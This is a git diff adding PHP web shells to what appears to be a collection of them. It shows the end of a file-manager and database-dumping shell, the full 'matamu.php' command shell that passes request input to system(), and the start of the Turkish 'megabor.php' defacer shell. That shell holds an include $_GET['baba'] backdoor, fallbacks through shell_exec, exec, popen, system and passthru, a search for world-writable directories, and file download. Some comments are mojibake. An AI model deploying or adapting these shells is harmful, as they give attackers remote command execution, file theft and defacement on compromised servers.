+// Ò³Ãæµ÷ÊÃâ€Ãƒï¿½Ãƒâ€¦Ãƒï¿½Ã‚¢
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//�¬½ÓÊý¾�¿â
+function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// È¥µôתÒå×Ö·û
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// Çå³ýHTML´úÂë
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// »ñȡȨ�Þ
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// ɾ³ýÃâ€Ã‚¿Ã‚¼
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while(@$file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// ±í¸ñÃ�Ã�¼äµÃâ€Ã‚±Â³Â¾Â°Ã‰Â«ÃŒÃ¦Â»Â»
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// »ñÈ¡µ±Ç°µÃâ€ÃƒÅ½Ãƒâ€Ã‚¼Ã¾Ã�µÃ�³Â·¾¶
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// »ñÈ¡µ±Ç°Ãâ€Ã‚¿Ã‚¼µÃâ€Ãƒâ€°Ãƒï¿½Ã‚¼Â¶Ãâ€Ã‚¿Ã‚¼
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// ¼ì²éPHPÅäÖòÎÊý
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = @opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// ѹËõ´ò°üÀà
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//ÃŽÃâ€Ã‚¼Ã¾Ã�Ã�±í
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// »ñµÃÖ¸¶¨Ãâ€Ã‚¿Ã‚¼ÎÃâ€Ã‚¼Ã¾Ã�Ã�±í
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// ±¸·�Êý¾�¿â
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// µ÷ÊÃâ€Ã‚ºÂ¯ÃŠÃ½
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+?>
+</td></tr></table>
+</td></tr>
+</tr>
+</table>
diff --git a/php/matamu.php b/php/matamu.php
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/php/matamu.php
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/php/megabor.php b/php/megabor.php
new file mode 100644
index 0000000..3b20746
--- /dev/null
+++ b/php/megabor.php
@@ -0,0 +1,660 @@
+<?               
+/*########################################### 
+Shell
+Bu Shell kodların derlemesi Megabros tarafından yapılmıştır..
+Yapımcı Ve derleyeN : Megabros
+###########################################*/
+error_reporting(0); 
+set_magic_quotes_runtime(0);
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
+if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
+elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
+else{return $requ."?".$link."=".$val;}}
+function delm($delmtxt){print"<center><table bgcolor=Maroon  style='border:1px red  ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=red >$delmtxt</td></tr></table></center>";}
+function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
+$nscmd=htmlspecialchars($scmd);print $nscmd;}
+elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
+$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
+elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
+while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
+print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ 
+ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
+ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
+print htmlspecialchars($pret);}}
+function input($type,$name,$value,$size)
+{if (empty($value)){print "<input type=$type name=$name size=$size>";}
+elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
+elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
+else {print "<input type=$type name=$name value=$value size=$size >";}}
+function permcol($path){if (is_writable($path)){print "<font color=red>";
+callperms($path); print "</font>";}
+elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red  >";
+callperms($path); print "</font>";}
+else {print "<font color=red >";callperms($path);}}
+if ($dlink=="dwld"){download($_REQUEST['dwld']);}
+function download($dwfile) {$size = filesize($dwfile);
+@header("Content-Type: application/force-download;name=$dwfile");
+@header("Content-Transfer-Encoding: binary");
+@header("Content-Length: $size");
+@header("Content-Disposition: attachment; filename=$dwfile");
+@header("Expires: 0");
+@header("Cache-Control: no-cache, must-revalidate");
+@header("Pragma: no-cache");
+@readfile($dwfile); exit;}
+?>
+
+<? include $_GET['baba']; ?>
+<html> 
+<head><title>Wardom | Ne Mutlu Türk'üm Diyene! | Edited By KingDefacer</title></head>
+<style> 
+BODY { SCROLLBAR-BASE-COLOR: darkred ; SCROLLBAR-ARROW-COLOR: red; } 
+a{color:#FF0000;text-decoration:none;font-family:tahoma;font-size:13px}
+a:hover{color:red}
+input{FONT-WEIGHT:normal;background-color: #FFFFFF;font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1px solid #666666;height:17}
+textarea{background-color:#FFFFFF;color:#FF0000;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #FF0000;}
+div{font-size:12px;font-family:tahoma;font-weight:normal;color:red  smoke}
+select{background-color: #FFFFFF; font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style> 
+<body bgcolor=DarkRed text=white ><font face="sans ms" size=3>
+</body> 
+</html> 
+<?
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #FF0000 solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #FF0000 solid \">";
+$c2="<tr><td style=\"border:1px #FF0000 solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=red  >";$efnt="</font>";
+################# Ending of common variables ########################
+
+//header table 1
+print"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<b>
+<center><font face=Wingdings color=#FFFFFF size=7> Z</font><font face=tahoma color=red size=7> TÃœRK <font face=tahoma color=white size=7> SHELL
+</font></font> <font face=Wingdings color=red size=7> F</font><font face=Wingdings color=red size=8>N
+</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+
+//header table 2
+print"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";
+
+//start header2 links
+//home
+print "<a href=".inclink('dlink', 'home').">AnaSayfa</a>";
+//go back
+print " - <a href='javascript:history.back()'>Geri</a>";
+//php info1
+print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">Php Bilgi</a>";
+//phpinfo2
+if ($dlink=='phpinfo'){print phpinfo();die();}
+//base64 decode1
+print " - <a href=".inclink('dlink', 'basepw').">Base64 Çözücü</a>";
+//url decode1
+print " - <a href=".inclink('dlink', 'urld').">Url Kod Çözücü</a>"; 
+//url encode1
+print " - <a href=".inclink('dlink', 'urlen').">Url Kodlayıcı</a>"; 
+//MD51
+print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
+//permission check1
+print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Ä°zinler</a>";
+//show file source
+print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>Dosya Kaynağı</a>";
+//quick index1
+print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>İndex Hazırla</a>";
+//send mail
+print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
+//Command helper
+print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd Yardım</a>";
+//end of links
+
+//base64 decode2
+if (isset ($_REQUEST['ncbase'])){
+$cbase =(base64_decode ($_REQUEST['ncbase']));  
+print "<p>Result is : $sfnt".$cbase."$efnt";  die();}
+if ($dlink=="basepw"){ 
+print "<p><b>[ Base64 - Çözücü ]</b>"; 
+print $sf;
+input ("text","ncbase",$ncbase,35);print " "; 
+input ("submit","","Çöz","");print $ef; die();}
+
+//url decode2
+if (isset ($_REQUEST['nurld'])){
+$urldc =(urldecode ($_REQUEST['nurld']));  
+print "<p>Result is : $sfnt".$urldc."$efnt";  die();}
+if ($dlink=='urld'){
+print "<p><b>[ Url - Çözücü ]</b>";   
+print $sf;
+input ("text","nurld",$nurld,35);print " "; 
+input ("submit","","Çöz","");print $ef; die();}
+
+//url encode2
+if (isset ($_REQUEST['nurlen'])){
+$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));  
+print "<p>Result is : $sfnt".$urlenc."$efnt";  die();}
+if ($dlink=='urlen'){
+print "<p><b>[ Url - Åifreleme ]</b>";   
+print $sf;
+input ("text","nurlen",$nurlen,35);print " "; 
+input ("submit","","Åifrele","");print $ef; die();}
+
+//MD52 
+if (isset ($_REQUEST['nmdf'])){
+$mdfe =(md5 ($_REQUEST['nmdf']));  
+print "<p>Result is : $sfnt".$mdfe."$efnt";  die();}
+if ($dlink=='mdf'){ 
+print "<p><b>[ MD5 - Åifreleme ]</b>"; 
+print $sf;
+input ("text","nmdf",$nmdf,35);print " ";
+input ("hidden","scdir",$scdir,22); 
+input ("submit","","Åifrele","");print $ef;die(); }
+
+//chk permission2
+if ($dlink=='perm'){
+print $sf;input("submit","mfldr","Ana-Klasör","");print " ";
+input("submit","sfldr","Alt-Klasör","");print $ef;
+
+print "<pre>";
+print "<p><textarea cols=120 rows=12>";
+if (isset($_REQUEST['mfldr'])){
+callfuncs('find . -type d -perm -2 -ls');
+}elseif (isset($_REQUEST['sfldr'])){
+callfuncs('find ../ -type d -perm -2 -ls');
+}print "</textarea>";print "</pre>";die();}
+//show file sources
+function callshsrc($showsc){
+if(isset($showsc)&&filesize($showsc)=="0"){
+print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
+elseif(isset($showsc)&&filesize($showsc) !=="0") {
+print "<p><table width=100% height=10% bgcolor=#FF0000 border=1><tr><td>";
